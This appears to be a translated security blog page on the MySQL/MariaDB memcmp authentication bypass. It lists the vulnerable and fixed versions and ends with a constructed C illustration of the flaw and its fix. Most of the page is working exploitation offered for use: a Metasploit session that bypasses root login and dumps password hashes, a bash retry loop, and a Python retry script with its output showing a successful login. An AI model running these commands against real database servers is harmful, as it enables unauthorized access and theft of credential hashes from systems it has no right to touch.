Analysis and exploitation of the MySQL authentication vulnerability
When a client connects to MariaDB/MySQL, the password it supplies is compared with the expected correct password. Because the result is handled incorrectly, MySQL can treat the two passwords as identical even when memcmp() returns a non-zero value. <br />
In other words, anyone who knows a user name can log straight in to the SQL database simply by retrying. According to the advisory, a guess succeeds roughly once in 256 attempts. Exploit tools have already appeared. <br />
Affected products: <br />
All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable. <br />
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not. <br />
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not. <br />
A Metasploit module that exploits this flaw has already been published online. <br />
<strong>It is used as follows</strong>: <br />
<br>
<div class="msgheader">The code is as follows:</div><div class="msgborder" id="phpcode2"> <br />
$ msfconsole <br />
msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump <br />
msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root <br />
msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1 <br />
msf auxiliary(mysql_authbypass_hashdump) > run <br />
[+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test <br />
[*] 127.0.0.1:3306 Authentication bypass is 10% complete <br />
[*] 127.0.0.1:3306 Authentication bypass is 20% complete <br />
[*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts <br />
[+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes... <br />
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D <br />
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D <br />
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D <br />
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D <br />
[+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89 <br />
[*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt <br />
[*] Scanned 1 of 1 hosts (100% complete) <br />
[*] Auxiliary module execution completed <br />
</div><br />
Test method 2: <br />
<strong>$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done</strong> <br />
<strong>mysql></strong> <br />
Test method 3: <br />
<br>
<div class="msgheader">The code is as follows:</div><div class="msgborder" id="phpcode3"> <br />
#!/usr/bin/python <br />
import subprocess <br />
<br />
# Run the mysql client with a wrong password over and over; an accepted <br />
# attempt drops into an interactive session. <br />
while True: <br />
    subprocess.Popen("mysql -u root mysql --password=blah", shell=True).wait() <br />
<br />
Output (the Access denied line repeats for every failed attempt): <br />
relik@stronghold:~# python mysql_bypass.py <br />
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES) <br />
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES) <br />
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES) <br />
Reading table information for completion of table and column names <br />
You can turn off this feature to get a quicker startup with -A <br />
Welcome to the MySQL monitor. Commands end with ; or \g. <br />
Your MySQL connection id is 24598 <br />
Server version: 5.1.62-0ubuntu0.11.10.1 (Ubuntu) <br />
Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved. <br />
Oracle is a registered trademark of Oracle Corporation and/or its <br />
affiliates. Other names may be trademarks of their respective <br />
owners. <br />
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. <br />
mysql> <br />
</div>
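The comparison flaw described at the top of this page, shown beside a hardened form as an added C example (not code from the original page or from the MySQL/MariaDB source). It assumes the mishandling is an int comparison result narrowed to a one-byte boolean; `bool8`, `wide_cmp`, both check functions and the sample tokens are hypothetical and constructed for illustration.

```c
#include <stddef.h>
#include <stdio.h>

typedef unsigned char bool8;   /* hypothetical one-byte boolean type */

/* Stand-in for an optimised memcmp(): compares 2-byte big-endian chunks and
   returns their difference. This is legal because C only specifies the SIGN
   of memcmp()'s result, not that it fits in a byte. n must be even. */
static int wide_cmp(const unsigned char *a, const unsigned char *b, size_t n)
{
    for (size_t i = 0; i + 1 < n; i += 2) {
        int wa = (a[i] << 8) | a[i + 1];
        int wb = (b[i] << 8) | b[i + 1];
        if (wa != wb)
            return wa - wb;
    }
    return 0;
}

/* Flawed check: nonzero means "mismatch", but the int is narrowed to one
   byte, so any result that is a nonzero multiple of 256 becomes 0. */
static bool8 mismatch_truncated(int cmp) { return (bool8)cmp; }

/* Hardened check: collapse to 0/1 before narrowing. */
static bool8 mismatch_fixed(int cmp) { return (bool8)(cmp != 0); }

/* Count nonzero comparison results in [lo, hi] that a check treats as equal. */
static int false_accepts(int lo, int hi, bool8 (*check)(int))
{
    int n = 0;
    for (int v = lo; v <= hi; v++)
        if (v != 0 && check(v) == 0)
            n++;
    return n;
}

/* Constructed sample: two tokens that differ only in the first byte. */
static const unsigned char expected[4] = {0x01, 0x00, 0xAA, 0xBB};
static const unsigned char supplied[4] = {0x00, 0x00, 0xAA, 0xBB};

int main(void)
{
    int cmp = wide_cmp(expected, supplied, sizeof expected);
    printf("cmp=%d truncated=%u fixed=%u\n", cmp,
           (unsigned)mismatch_truncated(cmp), (unsigned)mismatch_fixed(cmp));
    printf("false accepts, results in -128..127:     %d\n",
           false_accepts(-128, 127, mismatch_truncated));
    printf("false accepts, results in -65535..65535: %d of 131070\n",
           false_accepts(-65535, 65535, mismatch_truncated));
    printf("false accepts after the fix:             %d\n",
           false_accepts(-65535, 65535, mismatch_fixed));
    return 0;
}
```

When the comparison routine only ever returns byte-sized differences the flawed check never misfires, which is why the same server version can be exploitable on one build and not on another; upgrading to a fixed release listed above removes the dependency on the C library's behaviour.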